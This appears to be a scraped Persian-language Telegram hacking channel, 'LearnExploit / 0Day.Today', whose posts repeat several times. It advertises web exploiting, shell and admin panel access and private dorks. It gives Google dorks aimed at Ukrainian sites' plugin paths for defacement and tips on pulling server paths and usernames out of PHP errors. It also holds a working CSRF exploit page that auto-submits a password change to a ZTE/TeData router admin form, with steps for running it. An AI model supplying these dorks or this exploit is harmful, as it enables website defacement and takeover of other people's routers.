همانطور که تو عکس مشاهده میکنین این ارور مربوط به یکی از فایل های php داخل سایت هست
که میتونه
config.php
رو هم دربر بگیره
در قسمت مشخص شده در عکس
بخش
/home/.sites/122/site482/web/...
مسیر سروری هست که این فایل توش اپلود شده 😄
یوزر نیم سایت هم یکی از سه موارد (بیشتر اینگونه نیست و فقط یه نام بعد از home قرار میگیره) زیر هست:
.sites
or
122
or
site842
😁
به این نکته تو بررسی دایرکتوری ها توجه کنید دوستان
#found #User_Admin #server #Url
یاعلی
که میتونه
config.php
رو هم دربر بگیره
در قسمت مشخص شده در عکس
بخش
/home/.sites/122/site482/web/...
مسیر سروری هست که این فایل توش اپلود شده 😄
یوزر نیم سایت هم یکی از سه موارد (بیشتر اینگونه نیست و فقط یه نام بعد از home قرار میگیره) زیر هست:
.sites
or
122
or
site842
😁
به این نکته تو بررسی دایرکتوری ها توجه کنید دوستان
#found #User_Admin #server #Url
یاعلی
نحوه ی هک (دیفیس) سایت توسط باگ Url Posting
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :
<Start ~ Dorks >
| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"
<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::
http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :
<Start ~ Dorks >
| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"
<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::
http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
title :
( #TeDate_ZTE #Exploiting )
#Url_Patch
~#
/forms/tools_admin_1/
#Exploit
~#
<html>
<body onload="document.alqnas.submit()">
<form action="http://192.168.1.1/Forms/tools_admin_1" method="post" name="alqnas"> //Put Here Ur Rauter IP
<input type="hidden" name="uiViewTools_Password" value="new pass" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="new pass" />
</form>
</body>
</html>
#Explanations
~#
این باگ از نوع CSRF بوده و در این اکسپلویت درخواست تغییر یوزرنیم و پسورد رو میده
روش اجرا :
موارد زیر رو به نفع خودتون تغییر بدید 😄 :
name="Ur New Username "
value="Ur New Pass"
value="config Ur New Pass"
سپس اکسپلویت رو با پسوند .html سیو کرده
و اجرا کنید :)
روتر یوزر و پسورد جدید رو دریافت کرده :)
================
#X0P4SH4
-->
@LearnExploit ~ 0Day.Today
( #TeDate_ZTE #Exploiting )
#Url_Patch
~#
/forms/tools_admin_1/
#Exploit
~#
<html>
<body onload="document.alqnas.submit()">
<form action="http://192.168.1.1/Forms/tools_admin_1" method="post" name="alqnas"> //Put Here Ur Rauter IP
<input type="hidden" name="uiViewTools_Password" value="new pass" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="new pass" />
</form>
</body>
</html>
#Explanations
~#
این باگ از نوع CSRF بوده و در این اکسپلویت درخواست تغییر یوزرنیم و پسورد رو میده
روش اجرا :
موارد زیر رو به نفع خودتون تغییر بدید 😄 :
name="Ur New Username "
value="Ur New Pass"
value="config Ur New Pass"
سپس اکسپلویت رو با پسوند .html سیو کرده
و اجرا کنید :)
روتر یوزر و پسورد جدید رو دریافت کرده :)
================
#X0P4SH4
-->
Router Hacking@LearnExploit ~ 0Day.Today
👍1